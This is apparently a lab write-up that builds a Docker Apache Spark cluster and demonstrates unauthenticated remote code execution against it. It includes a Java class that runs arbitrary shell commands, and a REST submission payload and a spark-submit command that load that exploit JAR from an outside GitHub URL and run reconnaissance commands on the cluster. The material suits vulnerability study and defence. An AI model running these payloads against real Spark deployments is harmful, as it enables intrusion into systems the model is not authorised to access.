# Apache Spark Unauthorized Access Leading to Remote Code Execution
Apache Spark is a cluster computing system that lets users submit applications to the master node, which then distributes them across the cluster for execution. If ACL-based access control is not enabled on the master node, we can execute arbitrary code on the cluster.
References:
- https://weibo.com/ttarticle/p/show?id=2309404187794313453016
- https://xz.aliyun.com/t/2490
## Environment Setup
Execute the following command to start an Apache Spark cluster in standalone mode, with one master and one slave:
```
docker compose up -d
```
After the environment is up, visit `http://your-ip:8080` to see the master's management page, and `http://your-ip:8081` to see the slave's management page.
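To quickly confirm both nodes are reachable, you can check the two web UIs from the command line (a convenience check, not part of the original steps; the ports are the ones mentioned above):
```
curl -s -o /dev/null -w "%{http_code}\n" http://your-ip:8080   # master web UI, expect 200
curl -s -o /dev/null -w "%{http_code}\n" http://your-ip:8081   # slave web UI, expect 200
```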
## Exploitation
The essence of this vulnerability is that an unauthenticated user can submit an application to the master node, and that application can contain malicious code.
There are two ways to submit it:
1. Via the REST API
2. Via the submissions gateway (integrated into port 7077)
The application can be written in Java or Python. A minimal class like the following is enough (from reference link 1):
```java
import java.io.BufferedReader;
import java.io.InputStreamReader;

public class Exploit {

    public static void main(String[] args) throws Exception {
        // args[0] is a comma-separated list of shell commands to run
        String[] cmds = args[0].split(",");
        for (String cmd : cmds) {
            System.out.println(cmd);
            System.out.println(executeCommand(cmd.trim()));
            System.out.println("==============================================");
        }
    }

    // https://www.mkyong.com/java/how-to-execute-shell-command-from-java/
    private static String executeCommand(String command) {
        StringBuilder output = new StringBuilder();
        try {
            Process p = Runtime.getRuntime().exec(command);
            // Read stdout before waitFor() so a full pipe buffer cannot deadlock the child process
            BufferedReader reader = new BufferedReader(new InputStreamReader(p.getInputStream()));
            String line;
            while ((line = reader.readLine()) != null) {
                output.append(line).append("\n");
            }
            p.waitFor();
        } catch (Exception e) {
            e.printStackTrace();
        }
        return output.toString();
    }
}
```
Compile it into a JAR and host it on any HTTP or FTP server, for example `https://github.com/aRe00t/rce-over-spark/raw/master/Exploit.jar`.
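If you want to build the JAR yourself instead of using the prebuilt one, a minimal sketch (assuming a JDK is on your PATH; Python's `http.server` is just one convenient way to host the file):
```
javac Exploit.java                 # compile the class above
jar cvf Exploit.jar Exploit.class  # package it; mainClass "Exploit" sits at the JAR root
python3 -m http.server 8000        # serve the current directory over HTTP
```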
### Submitting an Application via the REST API
In standalone mode, the master starts an HTTP server on port 6066. We submit a REST-formatted API request to this port:
```
POST /v1/submissions/create HTTP/1.1
Host: your-ip:6066
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Content-Type: application/json
Connection: close
Content-Length: 680

{
    "action": "CreateSubmissionRequest",
    "clientSparkVersion": "2.3.1",
    "appArgs": [
        "whoami,w,cat /proc/version,ifconfig,route,df -h,free -m,netstat -nltp,ps auxf"
    ],
    "appResource": "https://github.com/aRe00t/rce-over-spark/raw/master/Exploit.jar",
    "environmentVariables": {
        "SPARK_ENV_LOADED": "1"
    },
    "mainClass": "Exploit",
    "sparkProperties": {
        "spark.jars": "https://github.com/aRe00t/rce-over-spark/raw/master/Exploit.jar",
        "spark.driver.supervise": "false",
        "spark.app.name": "Exploit",
        "spark.eventLog.enabled": "true",
        "spark.submit.deployMode": "cluster",
        "spark.master": "spark://your-ip:6066"
    }
}
```
Here, `spark.jars` is the compiled application, `mainClass` is the class to run, and `appArgs` are the arguments passed to the application.
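The same request can also be sent with curl; a quick sketch, assuming the JSON body above has been saved as `submission.json` (a hypothetical filename):
```
# POST the submission (submission.json is a placeholder for the JSON body above)
curl -X POST http://your-ip:6066/v1/submissions/create \
    -H "Content-Type: application/json" \
    --data @submission.json
```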
![](1.png)
The response contains a `submissionId`. Then visit `http://your-ip:8081/logPage/?driverId={submissionId}&logType=stdout` to view the execution result:
![](2.png)
Note that the application is submitted on the master, but the result is viewed on the slave that actually executed it (port 8081 by default). In real-world scenarios there may be multiple slaves, so you may need to check each of them.
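The log can also be fetched non-interactively; a sketch, where `driver-20250906160815-0000` is only a placeholder for the `submissionId` returned above:
```
# driverId below is a placeholder; substitute the submissionId from the response
curl -s "http://your-ip:8081/logPage/?driverId=driver-20250906160815-0000&logType=stdout"
```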
### Using the Submissions Gateway
If port 6066 is not accessible or is protected by access control, we can use the master's main port, 7077, to submit the application instead.
The method is to use the `bin/spark-submit` script that ships with Apache Spark:
```
bin/spark-submit --master spark://your-ip:7077 --deploy-mode cluster --class Exploit https://github.com/aRe00t/rce-over-spark/raw/master/Exploit.jar id
```
If the master you specify is a REST server, this script will first try to submit the application through the REST API; if it finds that the target is not a REST server, it falls back to submitting through the submissions gateway.
Viewing the result works the same way as before.